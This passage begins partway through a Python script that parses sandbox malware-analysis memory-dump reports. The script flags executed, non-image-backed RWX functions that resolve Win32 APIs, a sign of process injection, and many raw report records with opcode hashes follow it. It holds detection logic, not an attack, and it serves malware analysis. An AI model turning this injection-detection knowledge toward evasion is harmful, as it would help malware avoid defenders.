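    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None  # stays None for a truncated record


def parse_records(text: str) -> list[FunctionRecord]:
    """Each 'Source File' line opens a record; API bullets seen before it attach to it."""
    records: list[FunctionRecord] = []
    cur, pending, executed, in_apis = None, [], False, False
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("Executed Functions", "Non-executed Functions"):
            executed = line == "Executed Functions"
        elif line == "APIs":
            in_apis, pending = True, []
        elif line in ("Strings", "Memory Dump Source", "Similarity", "Uniqueness"):
            in_apis = False
        elif in_apis:
            if m := API_RE.match(line):
                pending.append(ApiCall(m.group(1), m.group(2), int(m.group(4), 16)))
        elif m := SRC_RE.match(line):
            parts = m.group(1).split(".")
            cur = FunctionRecord(executed, int(parts[0], 16), int(m.group(2), 16),
                                 int(parts[4], 16), m.group(3) == "true", pending)
            pending = []
            records.append(cur)  # appended at open, so a truncated record is kept
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur.fields[m.group(1)] = m.group(2).strip()
        elif cur is not None and (m := SCORE_RE.match(line)):
            cur.uniqueness = float(m.group(1))
    return records


def flag_rwx_api_callers(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Executed code in non-image-backed RWX memory that resolves Win32 APIs:
    the shape left behind by process injection or a manually mapped payload."""
    return [r for r in records if r.executed and not r.pe_backed
            and r.protection == PAGE_EXECUTE_READWRITE and r.apis]
```

Run `flag_rwx_api_callers(parse_records(SAMPLE))` and only the process 0x11 (17) function comes back: it executed, its region is not PE-backed, the protection field is 0x40 and it resolves SearchPathW. The process 0x0A function is non-executed and the truncated process 0x15 entry calls no API, so neither is flagged. On a full report the same check is a quick way to separate the injected-payload functions from the many non-executed or API-free fragments.
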
                                                                            Non-executed Functions

                                                                            Executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5cfba02d977ad97e72cbcae3f14e8b1c146998e6414fe1f85ab18ef0b760549
                                                                            • Instruction ID: 8c119bdf22c7e6dbe2bf881a71dee668739857bf5f02d7b5a247b3aa05220f33
                                                                            • Opcode Fuzzy Hash: c5cfba02d977ad97e72cbcae3f14e8b1c146998e6414fe1f85ab18ef0b760549
                                                                            • Instruction Fuzzy Hash: 8502C3707002158FCB15DFA8C880AEEB7F2EF84304B15C968E656AB395DB35EC46CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 95cf93bbe8760c786a41aefa8b2042892fdcb6d94552899b00bc896ff6d97281
                                                                            • Instruction ID: 0e1a1aa091aaaae9614cedb219a74eab0f34de4a9437b4c7e0a544c3bfaa7065
                                                                            • Opcode Fuzzy Hash: 95cf93bbe8760c786a41aefa8b2042892fdcb6d94552899b00bc896ff6d97281
                                                                            • Instruction Fuzzy Hash: 4FC17074304306CFE719DF29C984B9937E2BF88304F148968EA869B369DB74EC41DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2460909dd2b44f2279ac0d8484f23bbc4a5d12e05f723c2dc636e8dc7c3b377f
                                                                            • Instruction ID: 4b1c2f99d226ccaa335d22e05d82b4a5e012d993cc47d37b4fdf51f890130216
                                                                            • Opcode Fuzzy Hash: 2460909dd2b44f2279ac0d8484f23bbc4a5d12e05f723c2dc636e8dc7c3b377f
                                                                            • Instruction Fuzzy Hash: 3C2187753106008FC74AEB78D4A49AD37E2AF8921832601A9E506CF7B2DF25DC06CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c9293418ce200933d09903af11c20cf4e7a060fc573b187f960ba857aa6067a
                                                                            • Instruction ID: 5729e59ee1511aecd0e75b2c1a4a06b0672b0e706e9f744bef086731186ccade
                                                                            • Opcode Fuzzy Hash: 0c9293418ce200933d09903af11c20cf4e7a060fc573b187f960ba857aa6067a
                                                                            • Instruction Fuzzy Hash: 9D1108307041545FC705EBB8E85469D7F75DF86244F1041BAE245DF792CE359C02DB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c3ce6684db9dbc9846bc91cd330998f4191479345fad819a440cf3c7ab783735
                                                                            • Instruction ID: 919acc80cbe93201c0973e1c0bab792573cff4356c26f8af800cd9f445de4b91
                                                                            • Opcode Fuzzy Hash: c3ce6684db9dbc9846bc91cd330998f4191479345fad819a440cf3c7ab783735
                                                                            • Instruction Fuzzy Hash: DB0120B67012114FC7115B39F8C8D5E3BA4EF8575070547B4F9879B319CA30E801CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca5d4e42eef3dcf289d0b9b6023966eea7e9b518c0aceabf5e3ffc8e6aa5dd4a
                                                                            • Instruction ID: 8a270032eba074db153aaeebfcfbe3c9b7564894b5b17abcf2a41d134929420d
                                                                            • Opcode Fuzzy Hash: ca5d4e42eef3dcf289d0b9b6023966eea7e9b518c0aceabf5e3ffc8e6aa5dd4a
                                                                            • Instruction Fuzzy Hash: E9F052327092641FC31856385C606BF3BB9DFC621871904BFE00ACB382DE384C0693A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1537d6311fcf671fb8d920c4df31a44d291caabfc854c7241163bb661ca64bb1
                                                                            • Instruction ID: 30863ce47928722aeb647807ac45014a0f004206a3d22499883ccd59fbb2504e
                                                                            • Opcode Fuzzy Hash: 1537d6311fcf671fb8d920c4df31a44d291caabfc854c7241163bb661ca64bb1
                                                                            • Instruction Fuzzy Hash: 58F02275A0C28CAFCB07CFB99C859DEBFF9EE89100B1081FBE009D3252E63054018B01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80f4220c0a53d3b7685e33b49899026dbac177555314ab3497523a59efd42dac
                                                                            • Instruction ID: 9acb5a70e16dabc96faa2def2374bad8d705b2d36161f7ab98868790c85ca3e4
                                                                            • Opcode Fuzzy Hash: 80f4220c0a53d3b7685e33b49899026dbac177555314ab3497523a59efd42dac
                                                                            • Instruction Fuzzy Hash: 1FE06D7260411DAF8B04DFA9A9895DABBEDFA88161B108166F009D2211EA30A4408B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55ed1ccb0ad88e132797ef47d5caeff0037d6497fd7902e97316184319c10806
• Instruction ID: bd8f75d50fc3c3f82b726266a76b763fa293021775076ae6e606e9c22bd795a0
• Opcode Fuzzy Hash: 55ed1ccb0ad88e132797ef47d5caeff0037d6497fd7902e97316184319c10806
• Instruction Fuzzy Hash: 22F05531B0C3A00FCB16AB74A860A9D3BB14F82108B154ABEC002CB693CA3518068B83
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61cb68957af20de5e68b64eebb5bfc6c49030444c9baf26b291015a6e914a178
• Instruction ID: 8b1decb84ab7f5f22f2467a9ec879a830c040ce8af2a9c49d8da07bb5ec989d7
• Opcode Fuzzy Hash: 61cb68957af20de5e68b64eebb5bfc6c49030444c9baf26b291015a6e914a178
• Instruction Fuzzy Hash: 43D02E32B0D3D08FCB1282B82DA90EC3F708C0300070903EBD8C9CB192CA54590987A3
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5415ab5483d4423aa206bc1f15e18d20d135b800e12282fb1695dc7cd7a58017
• Instruction ID: 1c38a1906e170e1552a099721d5d89acf0670049a37f6cd52a085dbe6b79f1f4
• Opcode Fuzzy Hash: 5415ab5483d4423aa206bc1f15e18d20d135b800e12282fb1695dc7cd7a58017
• Instruction Fuzzy Hash: 4FE086341082D44FDF5A9B75E8A4A643FA09F45210B1803EAD0858B1A3C3686585DF00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d59d1816fe298b3e87c01527c0179488a9bb55a6b1df5eb883b03039c899068
• Instruction ID: a3c08a44d7d0e4c53198766ba96ece1e9f0c61f508f95073f63b3cf86d63abc7
• Opcode Fuzzy Hash: 5d59d1816fe298b3e87c01527c0179488a9bb55a6b1df5eb883b03039c899068
• Instruction Fuzzy Hash: 86D05E323101208FC3099B68F898E913B74DB49610F1142ABF1058B262C6B2DC028B80
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 309dc982399febba145d218bd6621d5eb840a71973ddcf087fb359b52e36bb41
• Instruction ID: af0e0e597976cdd0660c4ce3a2ab2c7f1ee533ee7fbd54453fe2e2fd78d11595
• Opcode Fuzzy Hash: 309dc982399febba145d218bd6621d5eb840a71973ddcf087fb359b52e36bb41
• Instruction Fuzzy Hash: 45C0124420F3C00FE74303B42C748243F700E8700478A40F7C0C48A4B381880019E73A
Uniqueness
• Uniqueness Score: -1.00%

Non-executed Functions